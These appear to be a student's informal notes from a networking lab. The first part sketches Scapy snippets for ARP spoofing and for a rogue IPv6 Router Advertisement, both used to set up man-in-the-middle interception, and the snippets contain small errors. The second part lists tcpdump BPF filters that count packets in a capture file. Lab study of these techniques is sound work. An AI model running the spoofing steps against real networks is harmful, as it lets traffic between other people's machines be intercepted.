Networking 1 - Task 1: ARP MitM 
SCAPY:
  a=ETHR()
    a.type=0x0806
  b=ARP()
    change op (op code) to 2 = is-at; 1 = who-has
    b.pdst="tgt ip" .126
    b.psrc="spoofed ip" .115
  c=ARP()
    c.op=2
    c.pdst="tgt ip" .115
    c.psrc="spoofed ip" .126
    
sendp (a/c, iface="eth0")    
sendp ( a/b, iface="eth0")
    ### trace through wireshark
    ### or: sudo tcpdump -vv icmp -X
    
    
    
Networking 1 - Task 2: ICMPv6 MitM , IPv6
  a=IPv6()
    a.dst="ff02::1" ### all nodes or ::1
  b=ICMPv6ND_RA()
  c=ICMPv6NDOptSrcLLAddr()
    c.lladdr="own mac"
  d=ICMPv6NDOptMTU()
  e=ICMPv6NDOptPrefixInfo()
    e.prefix="fd00:deaf:cafe::"
    
  send (a/b/c/d/e, iface="eth0")
    
    
Basic Analysis -
(ttl)sudo tcpdump 'ip[8]<=64||ip6[7]<=64' -r BPFCheck.pcap | wc -l
(dont frag)sudo tcpdump 'ip[6]&64=64' -r BPFCheck.pcap | wc -l
(high port)sudo tcpdump 'tcp[0:2]>1024||udp[0:2]>1024' -r BPFCheck.pcap | wc -l
(udp)sudo tcpdump 'ip[9]=17||ip6[6]=17' -r BPFCheck.pcap | wc -l
(tcp flags)sudo tcpdump 'tcp[13]=20||tcp[13]=17' -r BPFCheck.pcap | wc -l
(id)sudo tcpdump 'ip[4:2]=213' -r BPFCheck.pcap | wc -l
(vlan)sudo tcpdump 'ether[12:2]=0x8100' -r BPFCheck.pcap | wc -l
(dns)sudo tcpdump 'tcp[0:2]=53||tcp[2:2]=53||udp[0:2]=53||udp[2:2]=53' -r BPFCheck.pcap | wc -l
(dscp)sudo tcpdump 'ip[1]>>2=24' -r BPFCheck.pcap | wc -l
(traceroute)sudo tcpdump '(ip[9]=1||ip[9]=17)&&ip[8]=1' -r BPFCheck.pcap | wc -l














